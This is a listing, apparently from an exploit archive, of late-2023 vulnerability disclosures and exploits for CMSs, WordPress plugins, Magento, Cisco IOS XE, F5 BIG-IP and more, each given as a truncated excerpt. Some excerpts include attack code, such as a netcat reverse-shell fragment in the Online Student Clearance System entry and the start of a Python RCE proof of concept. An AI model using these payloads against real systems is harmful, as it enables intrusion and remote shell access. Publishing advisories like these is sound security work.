osCommerce 4 SQL Injection Vulnerability

Exploit Title: osCommerce 4 - SQL Injection Exploit Author: CraCkEr Date: 22/11/2023 Vendor: osCommerce ltd. Vendor Homepage: https://www.oscommerce.com/ Software Link: https://demo.oscommerce.com/ Demo Link: https://demo.oscommerce.com/b2b-supermarket/ Tested on: Windows 11 Home Impact: Database...

VMware Cloud Director - Bypass identity verification Exploit

CVE-2023-34060 vulnerability is a vulnerability that allows an attacker to bypass identity verification when entering port 22 ssh or port 5480 Device Management Console in VMware Cloud Director Appliance123. This vulnerability does not exist on port 443 VCD provider and tenant sign-in...

Winter CMS 1.2.2 / 1.2.3 Server-Side Template Injection Vulnerability

Exploit Title: Winter CMS 1.2.2 / 1.2.3 - Server-Side Template Injection SSTI Authenticated Exploit Author: tmrswrr Date: 12/05/2023 Vendor: https://wintercms.com/ Software Link: https://github.com/wintercms/winter/releases/v1.2.2 Vulnerable Versions: 1.2.2 / 1.2.3 Tested :...

ConQuest Dicom Server 1.5.0d Remote Command Execution Exploit

!/usr/bin/env python3 --------------------------------------------------------- preauth rce poc for ConQuest Dicom Server 1.5.0d --------------------------------------------------------- 04.08.2023 @ 22:07 code610 blogspot com import socket target = '192.168.56.106' rport = 5678 pkt1 =...

Docker cgroups Container Escape Exploit

This Metasploit exploit module takes advantage of a Docker image which has either the privileged flag, or SYSADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux...

ownCloud Phpinfo Reader Exploit

Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app graph installed contain a test file which prints phpinfo to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter. Docker m...

WordPress MW WP Form 5.0.1 Arbitrary File Upload Vulnerability

Vulnerability Summary from Wordfence Intelligence Description: MW WP Form = 5.0.1 – Unauthenticated Arbitrary File Upload Affected Plugin: MW WP Form Plugin Slug: mw-wp-form Affected Versions: = 5.0.1 CVE ID: CVE-2023-6316 CVSS Score: 9.8 Critical CVSS Vector:...

GaatiTrack Courier Management System 1.0 SQL Injection Vulnerability

Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php Version: v1.0 Teste...

TinyDir 1.2.5 Buffer Overflow Exploit

Title: Buffer overflow vulnerabilities with long path names in TinyDir Product: TinyDir Date: 2023-12-04 CVE ID: CVE-2023-49287 Severity: High - 7.7 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H Vendor URL: https://github.com/cxong/tinydir Advisory URL:...

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vulnerability

R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access. R Radio Network...

ARM Mali r44p0 Use-After-Free Exploit

Arm Mali r44p0: UAF by freeing waitqueue with elements on it In Mali r44p0, it became possible to free the kbasecontext of a kbasefile while still having a file pointing to the kbasefile. This is supposed to be safe because of the kfile-fopscount and kfile-mapcount checks. However, kbasepoll will...

Quick Quiz 2.4 File Upload - Remote Code Execution Vulnerability

Title: Quick-Quiz-2.4 File Upload - RCE Author: nu11secur1ty Vendor: https://mediacity.co.in/mediacity/ Software: https://codecanyon.net/item/quick-quiz-laravel-quiz-and-exam-system/21117633?srank=14 Reference: https://portswigger.net/web-security/file-upload,...

inTouch 1.0 File Upload - Remote Code Execution Vulnerability

Title: inTouch-1.0 File Upload - RCE Author: nu11secur1ty Vendor: https://codecanyon.net/user/media-city Software: https://codecanyon.net/item/intouch-laravel-support-ticket-management-system/35177425?srank=2 Reference: https://portswigger.net/web-security/file-upload,...

WBCE CMS 1.6.1 Shell Upload Vulnerability

Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution Exploit Author: tmrswrr Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.1.zip Version: 1.6.1 Tested on: https://www.softaculous.com/apps/cms/WBCECMS POC: 1 Login with admin...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

CE Phoenix 1.0.8.20 Remote Code Execution Exploit

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...

CSZ CMS 1.3.0 Shell Upload Vulnerability

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 23/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

WordPress Royal Elementor Addons Remote Code Execution Exploit

Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin 'WordPress Royal Elementor Addons RCE', 'Description' = %q Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin...

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution Vulnerability

The Atemio AM 520 HD Full HD satellite receiver has a vulnerability that enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the getcommand query within the application, allowing the attacker to gain root access...

Loytec LINX Configurator 7.4.10 Insecure Transit / Cleartext Secrets Vulnerability

CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 + Title : Multiple vulnerabilities in Loytec LINX Configurator + Vendor : LOYTEC electronics GmbH + Affected Products : LINX Configurator 7.4.10 + Affected Components : LINX Configurator + Discovery Date : 01-Sep-2021 + Publication date :...

PopojiCMS 2.0.1 Remote Command Execution Vulnerability

Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution Date: 27/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.popojicms.org/ Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip Version: Version : 2.0.1 Tested on:...

Loytec LINX Automation Servers Information Disclosure / Cleartext Secrets Vulnerability

Loytec LINX-151 with firmware version 7.2.4 and LINX-212 with firmware version 6.2.4 suffer from file disclosure vulnerabilities that leak secrets as well as issues with stories secrets in the clear. + CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 + Title : Multiple...

CSZ CMS 1.3.0 Remote Command Execution Exploit

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 17/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

SmartNode SN200 3.21.2-23021 OS Command Injection Vulnerability

Product: SmartNode SN200 Analog Telephone Adapter ATA & VoIP Gateway Manufacturer: Patton LLC Affected Versions: = 3.21.2-23021 Tested Versions: 2.21.1-22041, 3.21.2-23021, 3.22.0-23083 Vulnerability Type: OS Command Injection CWE-78 Vulnerability Type: Improper Access Control CWE-284 Risk Level:...

etcd-browser 87ae63d75260 Directory Traversal Vulnerability

An issue was discovered in server.js in etcd-browser 87ae63d75260. By supplying a /../../../ Directory Traversal input to the URL's GET request while connecting to the remote server port specified during setup, an attacker can retrieve local operating system files from the remote system...

CE Phoenix 1.0.8.20 Remote Command Execution Vulnerability

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix POC: 1. Login to admin panel: - Visit:...

Moodle 4.3 Remote Code Execution 0day Exploit

Pre-authentication exploit affecting recent versions of Moodle. The exploit allow remote code execution, work with default installations and should not require any authentication or user interaction...

WordPress UserPro 5.1.x Password Reset / Authentication Bypass / Privilege Escalation Vulnerability

WordPress UserPro plugin versions 5.1.1 and below suffer from an insecure password reset mechanism, information disclosure, and authentication bypass vulnerabilities. Versions 5.1.4 and below suffer from privilege escalation and shortcode execution vulnerabilities. Vulnerability Details & Technic...

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting Vulnerability

Exploit Title: Multiple Cross Site Scripting in PHPJabbers Availability Booking Calendar v5.0 Exploit Author: BugsBD Security Researcher Orpon Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0 Tested on:...

GaatiTrack Courier Management System 1.0 Cross Site Scripting Vulnerability

Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php...

Jorani Leave Management System 1.0.2 Host Header Injection Vulnerability

Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://jorani.org/ Software Link: https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip Version: v1.0.2 Tested on: Windows 10,...

PHPJabbers Availability Booking Calendar 5.0 CSV Injection Vulnerability

Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSV Injection Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0 Tested on: Windows...

Shuttle Booking Software 2.0 Cross Site Scripting Vulnerability

Exploit Title: Shuttle Booking Software v2.0 - Multiple Stored Cross-Site Scripting Authenticated Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/shuttle-booking-software/ Software Link: https://www.phpjabbers.com/shuttle-booking-software/...

FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection Exploit

FireBear Improved Import and Export version 3.8.6 for Magento 2.4.6 suffers from an XSLT server-side injection vulnerability that allows for command execution. Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection Command Execution Exploit...

Magento 2.4.6 XSLT Server Side Injection Vulnerability

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: Magento 2.4.6-p3 Version: 2.4.6 Tested on: 2.4.6 POC 1. Enter with admin credentials to this URL: https://magento2demo.firebearstudio.com...

Click Stocks 1.3 - File Upload Remote Code Execution Vulnerability

Title: Click Stocks-1.3 - File Upload - RCE Author: nu11secur1ty Vendor: https://codecanyon.net/user/media-city Software: https://codecanyon.net/item/click-stocks-free-stock-photos-laravel-script/23356416 Reference: https://portswigger.net/web-security/file-upload,...

TP-Link ER605 Unauthent LAN-side Remote Code Execution Exploit

TP-Link ER605 command injection lead to unauthent LAN-side RCE...

Magento 2.4.6 XSLT Server Side Injection / Command Execution Vulnerability

Magento version 2.4.6 suffers from an XSLT server side injection vulnerability that allows for remote command execution. Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link:...

WordPress Contact Form To Any API 1.1.2 SQL Injection Vulnerability

WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability. Exploit Title: WP Plugins Contact Form to Any API = 1.1.2 - SQL Injection Exploit Author: Arvandy Software Link: https://wordpress.org/plugins/contact-form-to-any-api/ Vendor Homepage:...

F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution Exploit

This Metasploit module exploits a directory traversal in F5's BIG-IP Traffic Management User Interface TMUI to upload a shell script and execute it as the Unix root user. Unix shell access is obtained by escaping the restricted Traffic Management Shell TMSH. The escape may not be reliable, and yo...

WordPress WP Rocket 2.10.3 Local File Inclusion Exploit

Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could...

LOYTEC Electronics Insecure Transit / Insecure Permissions / Unauthenticated Access Vulnerabilities

Products from LOYTEC electronics such as Loytec LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, and L-VIS Touch Panels suffer from improper access control and insecure transit vulnerabilities. + CVE : CVE-2023-46380, CVE-2023-46381, CVE-2023-46382 + Title : Multiple vulnerabilities in...

ZoneMinder Snapshots Command Injection Exploit

This Metasploit module exploits an unauthenticated command injection in zoneminder that can be exploited by appending a command to an action of the snapshot view. Versions prior to 1.36.33 and 1.37.33 are affected. This module requires Metasploit: https://metasploit.com/download Current source:...

Elementor Website Builder < 3.12.2 SQL injection Exploit

Elementor Website Builder versions prior to 3.12.2 suffer from a remote SQL injection vulnerability. EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code :...

MagnusBilling Remote Command Execution Exploit

This Metasploit module exploits a command injection vulnerability in MagnusBilling application versions 6.x and 7.x that allows remote attackers to run arbitrary commands via an unauthenticated HTTP request. A piece of demonstration code is present in lib/icepay/icepay.php, with a call to an exec...

Penglead 2.0 SQL injection Bypass Authentication Vulnerability

Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id parameter is...

Penglead 2.0 Multiple SQL injection Vulnerabilities

Title: PENGLEAD-2.0 Multiple-SQLi Author: nu11secur1ty Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The username parameter appears to be...

Php travel agency system 1.0 by oretnom23 Multiple SQL injection Vulnerabilities

Title: travel-1.0-by-oretnom23 Multiple-SQLi Author: nu11secur1ty Vendor: https://github.com/oretnom23 Software: https://github.com/oretnom23/php-travel-agency-system Reference: https://portswigger.net/web-security/sql-injection Description: The search parameter appears to be vulnerable to SQL...

Cisco IOX XE Unauthenticated Remote Code Execution Chain Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco IOX XE Unauthenticated RCE Chain', 'Description' = %q This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable...

Cisco IOX XE unauthenticated Command Line Interface Execution Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco IOX XE unauthenticated Command Line Interface CLI execution', 'Description' = %q This module leverages CVE-2023-20198 against vulnerable...